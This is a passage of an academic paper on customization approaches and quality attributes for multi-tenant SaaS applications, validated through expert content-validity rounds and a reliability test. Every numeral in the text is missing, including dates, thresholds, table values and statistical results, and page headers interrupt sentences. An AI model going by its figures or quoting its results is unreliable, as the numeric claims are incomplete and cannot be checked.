moreover, kabbedijk & jansen ( ) identified the types of customization in a tenant base. customization was classified as segment variability and tenant-oriented variability: in the former, customization is performed based on the requirements of a tenant community, whereas in the latter, it is performed based on the specific requirements of a tenant. the most closely related studies are listed and summarized in table . as table indicates, although there were some generic customization approaches proposed for saas, they did not explicitly declare the common customization practices for each approach. in addition, several inconsistencies are found across all proposals. for ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table a summary of generic classification of saas customization. references customization type based on li, shi & li ( ) gui , service , process, data and cross-layer saas architecture layers tsai & sun ( ) gui, service, process, data and qos saas architecture layers source code, composition and configuration manner of performing al-shardan & ziani ( ) gui, workflow and access control saas architecture layers müller et al. ( ) ui customization, desktop in- tegration and back-end cus- tomization manner of performing kabbedijk & jansen ( ) segment variability and tenant-oriented variability tenant and tenant’s community example, the term ‘‘user interface customization" is used in both (tsai & sun, ; müller et al., ), but with different meanings. additionally, these proposals argued for the relevance of this approach, yet they did not consider reporting a comprehensive validation either from academia or industry. saas quality many studies have focused entirely on defining and identifying the quality attributes of saas applications. for instance, khanjani et al. ( ) proposed a list of quality attributes for saas and provided their definitions and lee et al. ( ) proposed a comprehensive quality model for assessing saas cloud services. based on iso/iec (coallier, ), these authors identified characteristics and quality attributes and defined metrics to measure them. a systematic process was proposed by la & kim ( ) to build a high-quality saas application, taking the main saas design criteria into consideration. duarte filho et al. ( ) proposed a ‘‘saas quality" method for evaluating the quality of saas applications. the saas quality model, based on iso/iec (coallier, ) and it management models (publications service management, ; it governance institute, ), was generated as a part of the proposed method. another related study extracted the critical quality attributes for saas reusability and identified saas reusability metrics for every quality attribute (samir & darwish, ). cancian et al. ( ) have customized software quality models to fit the saas context, classifying the saas quality criteria for products and processes and identifying quality attributes for each class. nadanam & rajmohan ( ) proposed a qos model for web services in cloud computing, similar to the work of (lee et al., ). some of these attributes have been included in the lee model. however, these attributes only address a few relevant aspects; many other significant features remain to be considered. these two models focus largely on user perspectives. table summarizes all the saas quality models reported in this study. although some works in table mention customizability as a quality attribute of saas applications, none of them focused on the quality attributes of saas applications associated with customization. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table a summary of proposed quality models for saas application. references quality attributes inspired by khanjani et al. ( ) reliability, resiliency, accuracy, efficiency, service response time, stability, functionality, customizability, suitability, accessibility, learnability, commonality, multi-tenancy, operability,serviceability, robustness, data integrity, data privacy, adaptability, extensibility, flexibility, scalability, changeability, composability, maintainability, security management, composability and availability. service measurement index (csmic ) lee et al. ( ) efficiency, reliability, scalability, availability and reusability. iso/iec (coallier, ) la & kim ( ) supporting commonality, supporting multi tenant’s access, accessible via internet, thin client model, functionality, high reusability, high availability and high scalability. key characteristics desired properties of saas in (espadas, concha & molina, ; manford ) duarte filho et al. ( ) functionality, usability, security, performance, support, service level, portability iso/iec (coallier, ), itil v (management ) and cobit . (tgi ), samir & darwish ( ) understandability, modularity, composability, complexity, customizability,reliability, availability, efficiency. literature analysis perfomed by the authors cancian et al. ( ) integrity,reliability, security, accessibility,requirements development and management, infrastructure capability, quality control, acquisition, testing, performance, utilization of standards, change control, interoperability,robustness, availability, maintenance, version control, technically competent in business, technically competent employees, prevision of continuity of service, scalability, help desk, process quality certification, governance,reputation. literature analysis perfomed by the authors nadanam & rajmohan ( ) availability,reliability, scalability, efficiency,reusability, understandability, publicity, adaptability and composability. literature analysis perfomed by the authors conceptual model based on a systematic mapping study (sms) conducted by ali et al. ( ), the proposed model was initially constructed from customization practices and quality attributes in the saas multi-tenant context. each of the investigated customization practices was assigned to a customization approach (personalization, configuration, composition, modification, integration, and extension). these approaches were inferred from the most popular software customization proposals (ali et al., ). the model presented in this study, as shown in fig. , demonstrates the concept of all the approaches and saas quality. the purpose of the conceptual model is to analyze the variables in this study comprehensively. personalization approach the personalization approach refers to all solutions that provide transparent customization without needing to inform users (gilmore & pine, ; mathiassen & sandberg, ; sunikka & bragge, ). personalization involves gathering and analyzing datasets correlated to individuals and/or groups (tsai, shao & li, ; fan et al., ; tsai, huang & shao, ; truyen et al., ) accurately to implement services based on their ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure proposed model of this study. full-size doi: . /peerjcs. /fig- current and common preferences (tsai, shao & li, ; fan et al., ; truyen et al., ). moreover, a set of potential services is offered by publicly available pre-structured templates from saas providers (fan et al., ). the main data sources for personalization may be tenant or tenant communities (tsai, shao & li, ). recommendation mechanisms are often used with this approach to propose suitable services according to preferences, profiles, data, and service directories of the users (tsai, shao & li, ; fan et al., ). the personalization approach also considers the meaning (semantics) of user and community data (tsai, shao & li, ; fan et al., ) by employing runtime behavior adaptation facilities to adapt the behavior of saas applications to the performance context (truyen et al., ; xiaojun, yongqing & lanju, ; aulbach et al., ). a summary of common customization practices related to personalization in the context of multi-tenant saas applications is given in table . configuration approach according to the configuration approach, solutions offer a predefined setting for the alteration of application functions within a predefined scope (sun et al., ; brehm, heinzl & markus, ; parhizkar, ; davenport, ). diversity is usually maintained by establishing predefined parameters, options, and components, treating each user individually (xin & levina, ; salih & zang, ; kabbedijk & jansen, ). each saas tenant has to be able to configure the application by employing techniques to modify the functions of the applications within established limits (xin & levina, ; zhang et al., ; li, shi & li, ). meanwhile, saas providers have to develop sets of services and plugins with which tenants perform configurations (zhao et al., ; mohamed et al., ). this type of saas application must enable tenants to create or select features based on the template repository (tsai, shao & li, ; tsai, huang & shao, ; saleh, fouad ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table multi-tenant saas customization practices of personalization approach. id customization practice references par tenants profile tsai, shao & li ( ), fan et al. ( ), tsai, huang & shao ( ), truyen et al. ( ) par tenants preferences tsai, shao & li ( ), fan et al. ( ), truyen et al. ( ) par tenants behavioral activities fan et al. ( ), truyen et al. ( ) par service directory fan et al. ( ) par recommendation mechanism tsai, shao & li ( ), fan et al. ( ) par semantics data tsai, shao & li ( ), fan et al. ( ) par runtime personalization truyen et al. ( ), xiaojun, yongqing & lanju ( ), aulbach et al. ( ) par tenants and tenants communities (info source) tsai, shao & li ( ) table multi-tenant saas customization practices of configuration approach. id customization practice references con pre-defined parameters and options xin & levina ( ), salih & zang ( ), kabbedijk & jansen ( ) con tenant configuration interface xin & levina ( ), zhang et al. ( ), li, shi & li ( ) con provider plugins zhao et al. ( ), mohamed et al. ( ) con customization templates tsai, shao & li ( ), tsai, huang & shao ( ), saleh, fouad & abu-elkheir ( ), ralph ( ), chen, li & kong ( ), ruehl & andelfinger ( ), tsai & sun ( ) con template repository tsai, huang & shao ( ), saleh, fouad & abu-elkheir ( ), tsai & sun ( ) con customization point shahin ( ), mietzner & leymann ( ) con feature selection mohamed et al. ( ), ying et al. ( ) con runtime configuration xin & levina ( ), gey, landuyt & joosen ( ), moens & de turck ( ), shi et al. ( ) con features deactivation nguyen, colman & han ( ), moens et al. ( ) & abu-elkheir, ; ralph, ; chen, li & kong, ; ruehl & andelfinger, ; tsai & sun, ). a set of components, which accommodate a variety of tenant needs, is provided in the application template. by selecting a relevant component set, tenants can personalize each customization point (shahin, ; mietzner & leymann, ). when a tenant wishes to subscribe to the saas application, the capabilities of each feature within the system are analyzed to determine whether they ought to be incorporated into the application (mohamed et al., ; ying et al., ). all configurations established by the tenants must be adapted during the applications runtime (xin & levina, ; gey, landuyt & joosen, ; moens & de turck, ; shi et al., ). in addition, a disabling or excluding option for some features could be provided (nguyen, colman & han, ; moens et al., ). table summarizes the common customization practices of the configuration approach in the context of multi-tenant saas applications. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table multi-tenant saas customization practices of composition approach. id customization practice references com components consolidation and sharing saleh, fouad & abu-elkheir ( ), moens et al. ( ), moens, dhoedt & de turck ( ), liu et al. ( ), rico et al. ( ), ruehl, wache & verclas ( ), makki et al. ( ) com runtime composition moens et al. ( ), moens, dhoedt & de turck ( ), kumara et al. ( ), mietzner, leymann & papazoglou ( ), lee & choi ( ) com subcomponents composition kumara et al. ( ), schroeter et al. ( ), kumara et al. ( ) com decomposition shahin ( ), moens et al. ( ), gey et al. ( ) com components relationships li, shi & li ( ), shahin ( ), moens, dhoedt & de turck ( ) composition approach in this approach, the multiple interacting components of the saas application are consolidated and new components can be shared between tenants and end-users (saleh, fouad & abu-elkheir, ; moens et al., ; moens, dhoedt & de turck, ; liu et al., ; rico et al., ; ruehl, wache & verclas, ; makki et al., ). different components of the saas applications that collaborate must be composed during runtime (moens et al., ; moens, dhoedt & de turck, ; kumara et al., ; mietzner, leymann & papazoglou, ; lee & choi, ). the final composition must take into consideration the subcomponents of the core application (kumara et al., ; schroeter et al., ; kumara et al., ). the composition approach enables simplification of the consolidated saas components (shahin, ; moens et al., ; gey et al., ) as the relationships and dependencies between them are considered (li, shi & li, ; shahin, ; moens, dhoedt & de turck, ). table summarizes the common customization practices of the composition approach in the context of multi-tenant saas applications. extension approach saas application can be extended by adding custom code to be compiled during runtime (saleh, fouad & abu-elkheir, ; mietzner & leymann, ; correia, penha & da cruz, ). furthermore, a set of extension points, which permit a customized service to be plugged in, must be provided (mietzner & leymann, ; correia, penha & da cruz, ; moens & de turck, ; salih & zang, ). the saas provider should also supply an open platform and an api, which allows developers to compile custom code (replacements for existing objects or extensions to them) into the business object layers of the application (zhao et al., ; müller et al., ). any extension to a saas application may be public or accessible only by an individual tenant (aulbach et al., ). table summarizes the common customization practices of the extension approach in the context of multi-tenant saas. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table multi-tenant saas customization practices of extension approach. id customization practice references ext custom code insertion saleh, fouad & abu-elkheir ( ), mietzner & leymann ( ), correia, penha & da cruz ( ) ext extension points mietzner & leymann ( ), correia, penha & da cruz ( ) ext runtime extension moens & de turck ( ), salih & zang ( ) ext extension interface zhao et al. ( ), müller et al. ( ) ext replacements of existing code müller et al. ( ) ext private/public extension aulbach et al. ( ) integration approach in this case, the saas application must be capable of incorporating extra services via external saas providers (aulkemeier et al., ; sun et al., ; almorsy, grundy & ibrahim, ; scheibler, mietzner & leymann, ). most saas service customers assume that the saas application will merge easily with their in-house systems (müller et al., ; aulkemeier et al., ; sun et al., ; scheibler, mietzner & leymann, ; zhang, liu & meng, ). however, this integration must consider nonfunctional elements, such as security controls, which should be accommodated by the applications architecture (sun et al., ; almorsy, grundy & ibrahim, ), at both design time and runtime (aulkemeier et al., ; sun et al., ). integration platforms may present a service framework, responsible for assimilating services, and process frameworks, through which business processes can be executed (aulkemeier et al., ; sun et al., ). any additional services from third-party saas providers must employ different programming languages and run in different environments (scheibler, mietzner & leymann, ). in some cases, code or scripts will be utilized to incorporate these services (aulkemeier et al., ). incorporation requires an integration interface (aulkemeier et al., ; sun et al., ), synchronization toolkits, and data retrieval mechanisms to respond to the demands posed by integration (sun et al., ; zhang, liu & meng, ). in this study, the common customization practices related to the integration approach in the context of multi-tenant saas applications are summarized in table . modification approach this approach refers to techniques and solutions that alter the design or other functional requirements of the application by changing part of its source code (luo & strong, ; haines, ). the modifications must consider the allocation of resources to take the customized code into account, thereby ensuring operational cost-efficiency regarding maintenance and resource sharing among tenants (sun et al., ; moens & de turck, ; helmich et al., ). saas vendors must manage all elements of customization codes for any individual tenant without developing unique versions for each (sun et al., ). as a result, they should alter the code of the application when identical customizations are made by a considerable number of tenants (sun et al., ; moens & de turck, ). ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table multi-tenant saas customization practices of integration approach. id customization practice references int integration with another saas mohamed et al. ( ), aulkemeier et al. ( ), sun et al. ( ), almorsy, grundy & ibrahim ( ), scheibler, mietzner & leymann ( ) int integration with other on-premise applications müller et al. ( ), aulkemeier et al. ( ), sun et al. ( ), scheibler, mietzner & leymann ( ), zhang, liu & meng ( ) int non-functional integration sun et al. ( ), almorsy, grundy & ibrahim ( ) int runtime integration aulkemeier et al. ( ), sun et al. ( ) int service & process integration aulkemeier et al. ( ), sun et al. ( ) int integration of different pl applications scheibler, mietzner & leymann ( ) int third party code injection aulkemeier et al. ( ) int integration interface aulkemeier et al. ( ), sun et al. ( ) int synchronization & data retrieval tools sun et al. ( ), zhang, liu & meng ( ) table multi-tenant saas customization practices of modification approach. id customization practice references mod source code modifications sun et al. ( ), moens & de turck ( ), helmich et al. ( ) mod resources allocation for customized code sun et al. ( ), moens & de turck ( ) mod individual tenant basis sun et al. ( ) mod identical customizations sun et al. ( ), moens & de turck ( ) mod runtime modification moens & de turck ( ) mod dependency relationship of modified functions dong et al. ( ) mod namespaces, inheritance, and polymorphism lee & choi ( ) mod add or changes methods or attributes ziani & alshehri ( ), kong, li & zheng ( ) mod deletion of custom objects, methods, or attributes ziani & alshehri ( ), kong, li & zheng ( ) runtime code changes must consider the interrelationship between different functions, as one function can depend on one or several other functions simultaneously (dong et al., ). namespaces, inheritance, and polymorphism are often used to implement source code customizations in this case (lee & choi, ). source-code modifications are made by adding or deleting methods or attributes, or by changing the current implementation methods of the object (ziani & alshehri, ; kong, li & zheng, ). table summarizes the common customization practices of the modification approach in the context of multi-tenant saas applications. saas quality the list of saas quality attributes in the proposed customization solutions for saas applications was provided in (ali et al., ), but the attributes were not defined. therefore, in this work, we focus on the definitions provided by (khanjani et al., ), which have been evaluated and validated in a ph d dissertation (khanjani, ). moreover, ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table quality attributes of saas applications associated with customization. id quality attribute defination references qa multi-tenancy saas services can support in- stances of simultaneous access by multiple users for multiple ten- ants. khanjani et al. ( ), la & kim ( ) qa scalability saas providers can manage growth or decline in the level of services. khanjani et al. ( ), lee et al. ( ), nadanam & rajmohan ( ), zia & khan ( ), akojwar et al. ( ), csmic ( ) qa availability saas services can function within a specific time to satisfy users needs. khanjani et al. ( ), lee et al. ( ), nadanam & rajmohan ( ), akojwar et al. ( ), csmic ( ), cancian et al. ( ), alhamad, dillon & chang ( ) qa reliability saas application maintains op- erating and functioning under given conditions without failure within a given time period. khanjani et al. ( ), lee et al. ( ), nadanam & rajmohan ( ), akojwar et al. ( ), csmic ( ), cancian et al. ( ), alhamad, dillon & chang ( ) qa maintainability modifications to the application are made by saas provider to re- tain it in the condition of good repair. khanjani et al. ( ), csmic ( ), cancian et al. ( ) qa security the effectiveness of saas provider’s controls on service data, access to the services, and the physical facilities from which service are provided. khanjani et al. ( ), csmic ( ) qa usability the ease with which saas service can be used to achieve tenant- specific-goal. khanjani et al. ( ), alhamad, dillon & chang ( ) qa interoperability saas service can easily inter- act with other services from the same saas provider or other providers. khanjani et al. ( ), csmic ( ), cancian et al. ( ) qa efficiency saas services effectively utilize resources to perform their func- tions. khanjani et al. ( ), lee et al. ( ), nadanam & rajmohan ( ), akojwar et al. ( ) qa functionality saas application provides an ex- tensive set of features. khanjani et al. ( ), csmic ( ) qa accessibility saas services are operable by users with different disabilities. khanjani et al. ( ), csmic ( ), cancian et al. ( ) qa commonality saas services possess common features and are amenable to reuse by multiple users. khanjani et al. ( ), la & kim ( ), lee et al. ( ), nadanam & rajmohan ( ) qa response time saas application adheres to a de- fined time limit between service request and service response. khanjani et al. ( ), csmic ( ), salama et al. ( ), badidi ( ), song et al. ( ), he et al. ( ), wang et al. ( ) these definitions were compared with those available in the literature provided by other saas quality models. the identification and definitions of the quality attributes that play an important role in saas customization or could be influenced by customization are presented in table . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure conceptual model of this study. full-size doi: . /peerjcs. /fig- all the customization practices for each approach and the quality attributes associated with the relevant saas applications are presented in fig. . in this study, all customization approaches are variables that may affect the quality of saas applications. in the remaining sections of this study, customization practices and quality attributes are labeled as items, while approaches and saas quality are labeled as ‘‘constructs". methodology the methodology of this study is composed of three main phases, as indicated in fig. . the first phase is the development of the customization model concept for saas quality, as presented in the previous section. the second and third phases consider the content validity and reliability of the model. rounds of content validity content validity is a vital topic for high-quality measurement (wynd, schmidt & schaefer, ). it holds that each item has a requisite sample of aspects that depicts the construct of interest (cohen, manion & morrison, ). in this study, this quantity was evaluated to validate the conceptual model. content validity is generally determined based on the opinion of experts, who analyze if the model or instrument correctly depicts its concept (bell, bryman, & harley, ; hair et al., ), in the field. to validate the conceptual model, a questionnaire was elaborated and provided to researchers who had previous experience in the saas customization field. these researchers were identified through an extensive systematic mapping study and ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure methodology phases of this study. full-size doi: . /peerjcs. /fig- selected based on their published papers and affinity with this study, researchers were identified (ali et al., ). a cover letter describing the objective of the questionnaire and asking some personal information on the background of experts was attached. as the available literature on the classification and identification of software customization approaches and related quality attributes in the saas multi-tenant context is insufficient, we conducted iterative content validity evaluation as recommended by (polit & beck, ; parratt et al., ; harris & holloway, ). while designing the data analysis for each round, we primarily followed the content validity index (cvi) method, which is the common method for this purpose (bhatti & ahsan, ), as guided by (polit & beck, ). the popularity of cvi is not only limited to educational, psychological, or nursing research, but also to other disciplines or research areas, such as researches in software engineering and information systems (bhatti & ahsan, ; yilmaz et al., ; wang et al., ). in this study, two quantities were calculated (polit & beck, ): . the item content validity index (i-cvi) for each item. . the scale content validity index (s-cvi/ave), which is an average of the i-cvis for each construct. lynn ( ) suggests that at least three experts should be present to evaluate the model; however, more than ten experts would probably be unnecessary (polit & beck, ). other scholars mention that at least five experts should be sufficient to validate the model (zamanzadeh et al., ). questionnaires that queried the relevance of each item with respect to its construct were, therefore, sent to a group of experts. as recommended by (polit & beck, ; lynn, ; davis, ), the respondent replied according to a -point ordinal scale in which , , and respectively corresponded to ‘‘not relevant’’, ‘‘somewhat relevant’’, ‘‘quite relevant’’, and ‘‘very relevant’’. the experts were also requested to provide further comments about each item and construct and about the overall model, including recommendations for improvement. after each round (after at least five experts had replied to the questionnaire), the inputs and suggestions were analyzed. any item that was deemed unclear or did not meet the ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. i-cvi criteria was either revised or removed. the rounds were suspended when the s-cvi and i-cvi criteria were achieved: . i-cvi of . with to experts (polit & beck, ; lynn, ). . i-cvi of . or higher for to experts (polit & beck, ; lynn, ). . s-cvi of . or higher (polit & beck, ; yamada et al., ). our intention in round was to revise the items that did not meet the i-cvi criteria rather than deleting them. the deletion of invalid items or constructs was left to the subsequent rounds. this strategy, therefore, allowed most of the items to be assessed more than one time. furthermore, the cvi analysis in all rounds had to be supplemented by computation of the kappa coefficient to remove possible chance agreement among the experts (shrotryia & dhanda, ; polit & beck, ). the evaluation criteria for kappa are fair = k of . – . , good = k of . – . , and excellent = k > . (zamanzadeh et al., ; shrotryia & dhanda, ; polit & beck, ). reliability study after the content validity was established, a study was conducted to determine the reliability of the model. thirty-four respondents from software engineering research groups, familiar with saas applications, were purposively sampled. they were from four malaysian universities, namely universiti putra malaysia, universiti kebangsaan malaysia, universiti malaysia pahang, and universiti tenaga nasional. the reliability of the measured items used in the survey was examined using cronbachs alpha internal consistency test. its results range from to , in which high numbers indicate high reliability. values greater than . are excellent; between . and . are good; between . and . are acceptable; between . and . are questionable, and below . are poor (sekaran & bougie, ). the reliability of the research instrument or model is related to its consistency and stability (sekaran & bougie, ; alkawsi, ali & alghushami, ). the reliability of the model was assessed using three quantities: . cronbach’s alpha value for each construct must be . or above. . corrected item-total correlation should exceed . . . cronbachs alpha if item deleted must be lower than that of cronbach’s alpha for a construct. results the results of the content validity evaluation and consistency tests are reported in this section. rounds of content validity we conducted two evaluation rounds for content validity between february and june , starting with version of the model produced in the conceptualization phase. it was revised after each round, generating versions and . the versions , , and questionnaires are provided in appendices a–c. in round , the questionnaire was sent to the first researchers identified by ali et al. ( ); only five experts replied and completed the content validity questionnaire. ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. table basic research-related information of the experts participated in round . no designation research expertise experience researcher software engineering, software systems > associate professor software engineering < professor software engineering, software tools, model-driven development > associate professor software engineering > researcher software engineering, big data, ai < table basic research-related information of the experts participated in round . no designation research expertise experience assistant professor software engineering > professor software engineering > researcher software engineering, distributed & cloud computing > researcher software engineering, machine learning < associate professor software engineering, cloud computing > associate professor software engineering > therefore, in round , we considered sending it to all the researchers identified by ali et al. ( ) (including all the researchers who were addressed in round ); only six experts replied. tables and contain the basic research-related information of the experts who participated in rounds and . due to the satisfying level of consensus indicated by the i-cvi and s-cvi scores after the analysis of round , it was determined that an additional round was unnecessary; therefore, data collection was suspended. table demonstrates the level of consensus for each of the items in the two rounds as well as the initial items and constructs of round , and items and constructs of round . these items were deleted in round for the following reasons: . item con was removed as it was adequately measured by item con , thus item con was retained as its i-cvi ( . ) was higher than item con ( . ). . item mod was removed as it was applicable to all software developed with object- oriented approach. . item mod was merged with item mod as they complement each other. in round , consensus (i-cvi >= . ) was reached by the overall panel for of the items ( . %). an i-cvi of . was attained for items ( . %) and . for items ( . %). in addition, an i-cvi of . was attained for only of items ( . %). figure depicts the number of items in the i-cvi results. from our interpretation of the answers, the experts suggested that more refinement of the description was required for some items. the need for these refinements could have been avoided if the multi-tenancy concept was included. in round , the id of each item was redefined to reflect the resulting list of items from round . table also displays the i-cvis obtained from round . the , , , and of ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table results of i-cvi, s-cvi and kappa within content validity rounds. construct round_ round_ item_ i-cvi_ kappa s-cvi_ item_ i-cvi_ kappa s-cvi_ per . . per . . per . . per . per . . per . . per . . per . . per . . per . . per . . per . . per . per . . personalization a per . . per . . . con . . con . con . . con . con . con . con . con . con . con . . con . . con . . con . . con . con . . con . configuration con . . . . com . com . com . com . . com . . com . com . . com . . composition com . . com . . b ext . ext . ext . ext . . ext . . ext . . ext . ext . ext . . ext . extension ext . . ext . . . int . int . int . int . . int . int . . int . . int . int . . int . int . . int . int . . int . . int . . int . integration int . . . int . . . (continued on next page) ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) construct round_ round_ item_ i-cvi_ kappa s-cvi_ item_ i-cvi_ kappa s-cvi_ mod . . mod . . mod . . mod . mod . . mod . . mod . . mod . . mod . . mod . . mod . . mod . . mod . . mod . . mod . modification mod . . . . c qa . qa . qa . qa . qa . qa . qa . . qa . qa . . qa . qa . . qa . qa . . qa . qa . . qa . qa . . qa . qa . . qa . qa . . qa . . qa . . qa . saas quality qa . . . qa . . notes. aitems and costructs with red color were removed from the model. bs-cvi of composition construct after remvoing invalid items is . . cs-cvi of modification construct after remvoing invalid items is . . figure results of i-cvi within content validity rounds. full-size doi: . /peerjcs. /fig- ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of s-cvi within content validity rounds. full-size doi: . /peerjcs. /fig- items obtained i-cvis of . , . , . , and . respectively. in this round, all items that did not meet the minimum i-cvi of . were removed. however, more experts were involved in round than in round (considering the fact that the larger the set of experts, the harder it is to reach consensus), a significant improvement of the i-cvis results was produced in round . figure compares the i-cvis of both rounds. the scores in round varied from . , . , . , and . to . , . , . , and . in round . furthermore, a significant increase in the percentage of items obtaining an i-cvi of . in round was observed. furthermore, the kappa coefficient values in table show that items, items, and items in round received poor, fair, and excellent agreement respectively. conversely, items, items, and items in round received poor, good, and excellent agreement respectively. noticeably, all items with poor agreement also have poor i-cvi values. based on the s-cvi results in table , most of the constructs attained an acceptable s-cvi in both rounds, except for the personalization s-cvi in round that was . . figure shows that all s-cvi values were improved in round , except for the s-cvi value for personalization that dropped from . to . . the decision to delete the personalization construct and all of its associated items was taken for the following reasons: . comments from experts of both rounds indicated different interpretations; some of them thought of this construct as an alternative name for ‘‘customization, whereas others did not associate it with customization. . the s-cvi of . in round did not meet the s-cvi criteria (> = . ). . five of items associated with this construct did not meet the i-cvi criteria (>= . ) in round . moreover, the s-cvis of the composition ( . ) and modification ( . ) constructs in round improved to . and . , respectively, after removing their associated items that breached the i-cvi criteria. detailed calculations of the i-cvis, s-cvis, and kappa ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table the development of model in each version. construct original items deleted total items deleted final version round round personalization configuration composition extension integration modification saas quality total for rounds and are presented in tables in the supplementary documents: appendices d and e. because of the satisfactory level of consensus indicated by the i-cvi and s-cvi scores after round , no further rounds were necessary. in its final version, the software customization model for saas quality consisted of items, grouped into six constructs: items for configuration, items for composition, items for extension, items for integration, items for modification, and items for saas quality, as illustrated in table . internal consistency reliability test based on the results of the two content validity evaluation rounds, version of the model was further tested regarding its internal consistency reliability using a five-point likert scale ranging from (strongly disagree) to (strongly agree). in this study, selected profiles, including gender, ages, and familiarity with saas applications, were reported. a sample of software engineering researchers completed the survey. most of the respondents were male (n= , . %). the age of the majority of respondents ( . %) was between and years (n= ), followed by . % and . % for – (n= ) and over (n= ), respectively. the majority of respondents had an excellent knowledge of saas applications (n= , . %) and only . % (n= ) were somewhat familiar with it. the cronbachs alpha for each construct, corrected item-total correlation, and cronbachs alpha coefficients if the item was deleted are summarized in table . reliability analysis showed reasonable internal consistency. the computed values of cronbachs alpha for the configuration (n= ), composition (n= ), extension (n= ), integration (n= ), and modification (n= ) constructs, as well as saas quality (n= ) were . , . , . , . , . , and . , respectively. the corrected item-total correlation coefficients for configuration items ranged from . (con ) to . (con ); composition items ranged from . (com ) to . (com ); extension items ranged from . (ext ) to . (ext ); integration items ranged from . (int ) to . (int ); modification items ranged from . (mod ) to . (mod ); and saas quality items ranged from . (qa ) to . (qa ). ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. table reliability test results of validated model. construct item cronbach’s alpha if item deleted corrected item-total correlation construct item cronbach’s alpha if item deleted corrected item-total correlation con . . int . . con . . int . . con . . int . . b con . . int . . con . . int . . con . . int . . con . . int . . configuration ( . )a con . . int . . com . . integration ( . ) int . . com . . qa . . com . . qa . . composition ( . ) com . . qa . . ext . . qa . . ext . . qa . . ext . . qa . . ext . . qa . . ext . . qa . . extension ( . ) ext . . qa . . mod . . qa . . mod . . qa . . mod . . qa . . mod . . saas quality ( . ) qa . . modification ( . ) mod . . notes. avalue between brackets is cronbach’s alpha results for the construct. bitem with red colour is deleted based on cronbach’s alpha results if item deleted. table also indicates that none of the items significantly reduced the value of the alpha coefficient if they were removed from the construct, except for int (in this case, the value increased from . to . ). moreover, int had the lowest item-total correlation value ( . ), indicating that it did not measure the same construct as the other items. the resulting values indicate that the model has high reliability. discussion from the initial development of the software customization model for saas quality published in (ali et al., ), we realized that the concept should be refined. the concept was initially defined based on customization practices and quality attributes in the saas multi-tenant context. each customization practice was assigned to one of the customization approaches ( , , , , , and items for personalization, configuration, composition, extension, integration, and modification, respectively). ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to refine the model, a rigorous methodology, composed of an iterative content validity evaluation process and a reliability test, was followed. during the two content validity rounds, answers and comments were suggested by experts to further refine the language used and explicitly declare the multi-tenancy concept in the items. consequently, the i-cvis and s-cvis results varied between rounds and . in round , the items that breached the i-cvi criteria were re-written. moreover, a reduction in the number of items (from to ) was achieved. similarly, version , consisting of items, was created after round . a total of items were deleted in this round; , , and items were deleted from the modification, composition, and personalization constructs, respectively. although of items of the personalization construct did not breach the i-cvi criteria, they were deleted due to the removal of the personalization construct that did not meet the s-cvi criteria. several experts had conflicting opinions regarding the personalization construct. one opinion was that personalization is a synonym word for customization, hence, all approaches proposed in this study should be considered personalization approaches. the second point of view was that it is completely different from customization as it does not involve any customer action, which is essential for customization. the authors of this study agreed with the second opinion. the initial inclusion of personalization as an approach to customization in this study was due to the ultimate purpose of both mechanisms to meet the unique requirements of the customer by adapting the application to their needs. the results of rounds and indicated considerable discrepancy in the numbers of items deleted and revised. the number of items deleted in round ( ) was lower than that in round ( ). by contrast, the number of items revised in round ( items) was higher than that in round ( ). this result, however, is expected as the objective of the first round was to revise the items that did not meet the i-cvi criteria rather than delete them. the purpose of round , however, was to remove any item that did not meet the criteria. this strategy, therefore, allowed most of the items to be assessed twice. moreover, with this strategy, stability in the response of experts was also achieved with the recommended minimum number of rounds (two rounds) (landeta, ), overcoming the limitations of iteration structure methods (e.g., the delphi method), which does not specify any number of rounds (keeney, hasson & mckenna, ). the consensus for content validity was reached and an additional round was included to test the internal consistency reliability of the model items and constructs. in this round, software engineer researchers were asked to reassess the items and evaluate them using a - point likert-type scale. the reliability, found by using cronbachs alpha, is proof of items consistently representing the constructs. in this test, only one item was deleted to increase the value of cronbachs alpha. at the end of this round, all constructs and items achieved the required values of reliability and validity. the final version of the proposed model is shown in fig. . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure final proposed software customization model for saas quality. full-size doi: . /peerjcs. /fig- threats to validity three major limitations emerge. these include sample size, selection bias, and modification bias. sample size the experts involved in the content validation rounds numbered in the first round and in the second round. although this sample is 